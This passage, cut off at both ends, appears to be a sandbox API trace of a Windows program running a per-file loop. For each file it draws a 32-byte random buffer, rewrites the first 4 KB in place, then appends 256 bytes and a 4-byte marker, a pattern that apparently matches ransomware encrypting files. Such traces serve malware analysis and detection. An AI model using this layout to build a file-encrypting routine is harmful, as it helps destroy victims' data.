lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.058] GetProcessHeap () returned 0x280000 [0076.058] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.058] CloseHandle (hObject=0x7dc) returned 1 [0076.059] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 23 [0076.059] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.059] ReadFile (in: hFile=0x7e0, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.059] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.059] GetProcessHeap () returned 0x280000 [0076.059] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.060] GetProcessHeap () returned 0x280000 [0076.060] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.060] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.060] GetProcessHeap () returned 0x280000 [0076.060] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.060] ReadFile (in: hFile=0x7e0, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.134] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.134] WriteFile (in: hFile=0x7e0, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.134] GetProcessHeap () returned 0x280000 [0076.134] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.134] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.135] GetProcessHeap () returned 0x280000 [0076.135] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.135] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.136] GetProcessHeap () returned 0x280000 [0076.136] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.136] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.137] GetProcessHeap () returned 0x280000 [0076.137] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.137] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.138] GetProcessHeap () returned 0x280000 [0076.138] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.138] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.139] SetFilePointerEx (in: hFile=0x7e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.139] WriteFile (in: hFile=0x7e0, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.139] WriteFile (in: hFile=0x7e0, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.139] GetProcessHeap () returned 0x280000 [0076.139] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.139] CloseHandle (hObject=0x7e0) returned 1 [0076.140] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 24 [0076.140] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.141] ReadFile (in: hFile=0x7e4, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.141] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.141] GetProcessHeap () returned 0x280000 [0076.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.141] GetProcessHeap () returned 0x280000 [0076.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.141] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.141] GetProcessHeap () returned 0x280000 [0076.141] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0076.141] ReadFile (in: hFile=0x7e4, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.199] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.199] WriteFile (in: hFile=0x7e4, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.199] GetProcessHeap () returned 0x280000 [0076.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.199] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.200] GetProcessHeap () returned 0x280000 [0076.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.200] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.201] GetProcessHeap () returned 0x280000 [0076.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.201] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.202] GetProcessHeap () returned 0x280000 [0076.202] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: 